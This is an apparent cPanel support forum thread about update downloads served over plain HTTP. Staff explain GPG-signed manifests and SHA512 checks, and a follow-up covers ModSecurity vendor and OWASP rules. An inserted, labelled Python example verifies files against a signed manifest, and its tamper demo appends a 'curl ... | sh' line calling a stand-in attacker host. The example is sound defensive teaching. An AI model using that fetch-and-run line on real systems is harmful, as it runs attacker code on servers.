cPanel updates are not over https!
Is there a reason that the following URL is only accessible over insecure HTTP, instead of HTTPS?
Downloads | cPanel, Inc.
This is even going against your own warnings with WHM that:
We recommend that the URL support SSL in order to prevent man-in-the-middle attacks and ensure the downloaded configuration is legitimate.
Hello,

This is documented at: Download Security - cPanel Knowledge Base - cPanel Documentation

Here's a quote from this document that explains how the security works:

"cPanel & WHM versions 11.48 and later include functionality to validate that all files downloaded from cPanel are delivered in a pristine state. This avoids any possibility of corruption due to a compromise of cPanel's mirror system or tampering with the server's connection to cPanel's systems. The new signature verification logic requires that all assets downloaded from the httpupdate mirrors are either directly validated through separate GPG signature files, or anchored to a signed asset using cryptographically secure checksums. For instance, the cPanelSync v1 manifest files are signed directly and the files referenced by the manifests are verified through SHA512 hashes. Assets downloaded from other cPanel systems (such as the public portion of our GPG keys) are validated through SSL connections."
Regarding the validation of GPG keys, these keys are downloaded from Secure Downloads | cPanel, Inc. during the nightly upcp using the system's wget binary.

Let us know if you have any additional questions.

Thank you.
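The reply above describes a two-level trust chain: a manifest that carries its own GPG signature, and per-file SHA512 hashes inside that manifest which every referenced download must match. The example below is added here to illustrate that model and is not cPanel's own code; cPanelSync's real manifest format is not reproduced. The manifest line format ("<sha512hex>  <relative path>"), the function names, the pinned-keyring gpg invocation and the sample files in demo() are all assumptions for illustration. The key point it makes in code: when the signature on the manifest fails, per-file hashes are never consulted, because a hash list an attacker can rewrite anchors nothing.

```python
"""Verify downloaded assets against a GPG-signed manifest of SHA512 hashes.

Added example, not cPanel's code. Manifest format and names are assumed.
"""
import hashlib
import hmac
import os
import subprocess
import tempfile
from typing import Callable, Dict, Tuple

# A verifier takes (manifest_path, detached_signature_path) and returns True
# only when the signature checks out against a key we already trust.
SigVerifier = Callable[[str, str], bool]


def gpg_verifier(keyring: str) -> SigVerifier:
    """Real verifier: gpg with an explicit pinned keyring (assumed invocation).

    --no-default-keyring plus --keyring means only the vendor key we pinned
    can satisfy the check, not whatever else happens to be in ~/.gnupg.
    """
    def verify(manifest_path: str, signature_path: str) -> bool:
        result = subprocess.run(
            ["gpg", "--batch", "--no-default-keyring", "--keyring", keyring,
             "--verify", signature_path, manifest_path],
            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
        )
        return result.returncode == 0
    return verify


def sha512_hex(path: str) -> str:
    """Stream the file so a large download is not read into memory at once."""
    h = hashlib.sha512()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse assumed '<sha512hex>  <path>' lines; blanks and '#' comments are skipped."""
    entries: Dict[str, str] = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition("  ")
        if len(digest) != 128 or not name:
            raise ValueError(f"malformed manifest line {lineno}: {line!r}")
        entries[name] = digest.lower()
    return entries


def verify_download(root: str, verify_sig: SigVerifier) -> Tuple[bool, Dict[str, bool]]:
    """Return (manifest_trusted, {path: hash_matches}).

    If the manifest signature fails, nothing else is checked and no per-file
    results are reported, so a caller cannot be tempted to act on them.
    """
    manifest_path = os.path.join(root, "manifest.txt")
    sig_path = manifest_path + ".asc"
    if not verify_sig(manifest_path, sig_path):
        return False, {}
    with open(manifest_path, encoding="utf-8") as fh:
        expected = parse_manifest(fh.read())
    results: Dict[str, bool] = {}
    for name, digest in expected.items():
        path = os.path.join(root, name)
        if not os.path.isfile(path):
            results[name] = False  # referenced but missing: treat as failed
            continue
        # constant-time compare so timing does not leak matching prefix length
        results[name] = hmac.compare_digest(sha512_hex(path), digest)
    return True, results


def demo() -> Dict[str, object]:
    """Constructed sample: two files, one tampered after the manifest was written."""
    with tempfile.TemporaryDirectory() as root:
        files = {"bin/upcp": b"#!/bin/sh\necho upcp\n", "etc/cpanel.conf": b"x=1\n"}
        for name, data in files.items():
            os.makedirs(os.path.dirname(os.path.join(root, name)), exist_ok=True)
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        manifest = "".join(f"{hashlib.sha512(d).hexdigest()}  {n}\n" for n, d in files.items())
        with open(os.path.join(root, "manifest.txt"), "w", encoding="utf-8") as fh:
            fh.write(manifest)
        # empty placeholder signature: the demo injects the verifier result below
        open(os.path.join(root, "manifest.txt.asc"), "w").close()
        # simulate a compromised mirror altering one file after signing
        with open(os.path.join(root, "bin/upcp"), "ab") as fh:
            fh.write(b"curl http://attacker.invalid | sh\n")
        trusted, per_file = verify_download(root, lambda m, s: True)
        untrusted, nothing = verify_download(root, lambda m, s: False)
    return {"trusted": trusted, "files": per_file,
            "untrusted": untrusted, "checked_when_untrusted": len(nothing)}
```

In demo() the signature step is injected rather than run, so the block runs offline; on a real system pass gpg_verifier("/path/to/pinned-vendor.gpg") instead. The tampered bin/upcp fails its SHA512 check while etc/cpanel.conf passes, and with a failed signature no file is checked at all.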
Hello,

The vendor rules offered directly from cPanel should already exist under "WHM Home » Security Center » ModSecurity Vendors » Manage Vendors".

Regarding the availability of the new OWASP rules, this is fixed in cPanel version 64: OWASP ModSecurity Core Rule Set v3

Thank you.